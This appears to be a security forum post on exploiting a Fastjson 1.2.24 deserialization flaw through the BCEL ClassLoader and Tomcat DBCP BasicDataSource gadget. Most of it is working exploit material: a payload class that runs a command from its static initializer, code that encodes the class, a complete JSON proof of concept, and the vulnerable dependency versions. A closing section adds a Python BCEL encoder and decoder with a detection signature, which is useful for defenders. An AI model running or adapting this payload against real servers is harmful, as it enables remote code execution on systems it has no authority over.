Fastjson vulnerability
The BCEL ClassLoader (com.sun.org.apache.bcel.internal.util.ClassLoader) was removed in JDK 8u261.
The gadget classes commonly used with Fastjson are these three:
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
com.sun.rowset.JdbcRowSetImpl
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
Exploitation via the BCEL ClassLoader
Compile the payload class with javac Evil.java:
public class Evil {
    static {
        // Static initializer: runs as soon as the class is initialized by any loader
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {}
    }
}
Turn Evil.class into BCEL-encoded bytecode (gzip, then BCEL's $-escaping), and load it back through the BCEL ClassLoader:
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
JavaClass cls = Repository.lookupClass(Evil.class);
String code = Utility.encode(cls.getBytes(), true);   // true = gzip before escaping
System.out.println(code);
// A class name starting with $$BCEL$$ makes this loader decode and define the class; either form works:
// Class.forName("$$BCEL$$" + code, true, new ClassLoader());
new ClassLoader().loadClass("$$BCEL$$" + code).newInstance();   // newInstance() runs the static block
PoC
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;

public static void loadFastJson() throws Exception {
    // BCEL-encode the compiled Evil class (gzip + $$BCEL$$ escaping)
    JavaClass cls = Repository.lookupClass(Evil.class);
    String code = Utility.encode(cls.getBytes(), true);
    // The BasicDataSource object is placed in key position on purpose: fastjson calls
    // toString() on the parsed key, which serializes it and invokes its getters, including
    // getConnection(); that ends in Class.forName(driverClassName, true, driverClassLoader).
    String poc = "\n" +
            "{\n" +
            "  {\n" +
            "    \"aaa\": {\n" +
            "      \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
            "      \"driverClassLoader\": {\n" +
            "        \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
            "      },\n" +
            "      \"driverClassName\": \"$$BCEL$$" + code + "\"\n" +
            "    }\n" +
            "  }: \"bbb\"\n" +
            "}";
    System.out.println(poc);
    JSON.parse(poc);   // parsing alone is enough to run Evil's static initializer
}
Dependencies
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.24</version>
</dependency>
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-dbcp</artifactId>
<version>8.5.55</version>
</dependency>
The same code throws an exception under Java 8u261: when the JDK upgraded its bundled BCEL to 6.0, the ClassLoader class shipped with BCEL was removed.
On Tomcat 6.0.53, 7.0.81 and similar versions the class is org.apache.tomcat.dbcp.dbcp.BasicDataSource (DBCP 1.x packaging), so the @type in the PoC has to be changed accordingly:
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>dbcp</artifactId>
<version>6.0.53</version>
</dependency>
Full form of the PoC (the $$BCEL$$ value is truncated here):
{
{
"@type": "com.alibaba.fastjson.JSONObject",
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$l$8b$I$A$..."
}
}: "x"
}
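The $$BCEL$$ string in the PoCs above is produced by BCEL's Utility.encode: gzip the class bytes, copy [0-9A-Za-z_] bytes through unchanged, write byte values below 48 as '$' plus one character from a 48-entry map (A-Z, g-z, '$', '_'), and everything else as '$' plus two lowercase hex digits. The following Python port is an added example, not code from the original page or from BCEL/Fastjson: it encodes a payload without a JDK and decodes $$BCEL$$ strings found in a request body for triage (does it decompress, does it start with 0xCAFEBABE, which class-file version). FAKE_CLASS and SAMPLE_BODY are constructed here; FAKE_CLASS is only the class-file magic plus a Java 8 version word and padding, not a loadable class.

```python
import gzip
import re
import struct

TOKEN = "$$BCEL$$"
ESCAPE = "$"
# CHAR_MAP from com.sun.org.apache.bcel.internal.classfile.Utility: byte values
# 0..47 are written as '$' plus one of these 48 characters (A-Z, g-z, '$', '_').
CHAR_MAP = [chr(c) for c in range(ord("A"), ord("Z") + 1)]
CHAR_MAP += [chr(c) for c in range(ord("g"), ord("z") + 1)]
CHAR_MAP += ["$", "_"]
MAP_CHAR = {ch: i for i, ch in enumerate(CHAR_MAP)}


def _is_identifier_part(b):
    """BCEL's own ASCII-only check: [0-9A-Za-z_] bytes are copied through unescaped."""
    return (0x30 <= b <= 0x39 or 0x41 <= b <= 0x5A
            or 0x61 <= b <= 0x7A or b == 0x5F)


def bcel_encode(data, compress=True):
    """Port of Utility.encode(bytes, compress): gzip first, then escape each byte."""
    if compress:
        data = gzip.compress(data, mtime=0)
    out = []
    for b in data:
        if _is_identifier_part(b):
            out.append(chr(b))
        elif b < len(CHAR_MAP):          # "special" escape: '$' + map character
            out.append(ESCAPE + CHAR_MAP[b])
        else:                            # "normal" escape: '$' + two lowercase hex digits
            out.append(ESCAPE + "%02x" % b)
    return "".join(out)


def bcel_decode(text, uncompress=True):
    """Port of Utility.decode(text, uncompress), mirroring JavaReader.read()."""
    out = bytearray()
    i = 0
    while i < len(text):
        ch = text[i]
        if ch != ESCAPE:
            out.append(ord(ch))
            i += 1
        elif text[i + 1] in "0123456789abcdef":   # hex digits never collide with CHAR_MAP
            out.append(int(text[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(MAP_CHAR[text[i + 1]])
            i += 2
    data = bytes(out)
    return gzip.decompress(data) if uncompress else data


def find_bcel_payloads(body):
    """Pull every $$BCEL$$ string out of a request body and decode it for triage.

    Returns one dict per hit: offset, decoded length, whether the bytes start with the
    class-file magic 0xCAFEBABE, and the class-file major version (52 = Java 8).
    Malformed or truncated payloads are reported with an "error" key instead.
    """
    hits = []
    for m in re.finditer(r"\$\$BCEL\$\$([A-Za-z0-9_$]+)", body):
        try:
            cls = bcel_decode(m.group(1))
        except Exception as exc:
            hits.append({"offset": m.start(), "error": repr(exc)})
            continue
        major = struct.unpack(">H", cls[6:8])[0] if len(cls) >= 8 else None
        hits.append({"offset": m.start(), "decoded_len": len(cls),
                     "is_classfile": cls[:4] == b"\xca\xfe\xba\xbe",
                     "major_version": major})
    return hits


# Constructed stand-in for Evil.class: only the class-file magic and a Java 8 version
# word followed by padding. It is NOT a loadable class; a real payload would use the
# bytes of the compiled Evil.class.
FAKE_CLASS = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + bytes(24)

# Constructed request body in the shape of the PoC above, carrying the encoded stub.
SAMPLE_BODY = (
    '{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",'
    '"driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},'
    '"driverClassName":"' + TOKEN + bcel_encode(FAKE_CLASS) + '"}'
)

if __name__ == "__main__":
    print(SAMPLE_BODY)
    for hit in find_bcel_payloads(SAMPLE_BODY):
        print(hit)
```

Because every encoded string starts with the gzip header 1f 8b 08 00, a real payload always begins with "$$BCEL$$$l$8b$I$A", which matches the truncated value in the PoC above and is a cheap signature for a WAF or log search; the decoder then confirms whether a class file is actually inside.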
Last edited by 不一样的少年 on 2022-03-11 14:37